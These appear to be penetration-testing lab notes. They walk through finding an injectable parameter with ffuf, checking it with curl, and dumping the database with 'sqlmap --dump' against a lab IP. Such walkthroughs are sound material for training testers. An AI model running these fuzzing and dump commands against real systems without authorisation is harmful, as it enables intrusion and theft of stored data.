SQLI

This is the automated method of finding and exploiting SQLi: first identify the parameter the application actually processes, confirm it with a sample request, then hand it to sqlmap.

STEP 1: IDENTIFY THE VULNERABLE PARAMETER
root@oco:~$ find / -iname burp-param* 2>/dev/null
 /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt . 

root@oco:~$ ffuf -w burp-parameter-names.txt -u 'http://<TARGET IP>:3003/?FUZZ=test_value'
 ...
 :: Progress: [40/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorpassword                [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [40/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorurl                     [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [41/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorc                       [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [42/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorid                      [Status: 200, Size: 38, Words: 7, Lines: 1]
 :: Progress: [43/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Erroremail                   [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [44/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errortype                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [45/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorusername                [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [46/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorq                       [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [47/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errortitle                   [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [48/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errordata                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [49/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errordescription             [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [50/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorfile                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [51/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errormode                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [52/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors                       [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [53/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errororder                   [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [54/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorcode                    [Status: 200, Size: 19, Words: 4, Lines: 1]
 :: Progress: [55/2588] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errorlang                    [Status: 200, Size: 19, Words: 4, Lines: 1]

 * notice the same response size (19) in almost every request. This is because supplying
   an unknown parameter returns the same text rather than an error such as 404, so a
   size of 19 is the baseline response to filter out

#filter out any responses having a size of 19
root@oco:~$ ffuf -w burp-parameter-names.txt -u 'http://<TARGET IP>:3003/?FUZZ=test_value' -fs 19
 ...
 id                      [Status: 200, Size: 38, Words: 7, Lines: 1, Duration: 9ms]

 * the id parameter returns a different response, [Status: 200, Size: 38, Words: 7, Lines: 1],
   which means it is a valid parameter (the application handles it differently from unknown ones)

#send a sample request with a plausible value to see what the parameter returns
root@oco:~$ curl http://<TARGET IP>:3003/?id=1
 [{"id":"1","username":"admin","position":"1"}]
 
root@oco:~$ curl http://10.129.202.133:3003/?id=3
 [{"id":"3","username":"WebServices","position":"3"}]
root@oco:~$ which sqlmap
 ...
root@oco:~$ sqlmap -u 'http://10.129.202.133:3003/?id=1' --dump
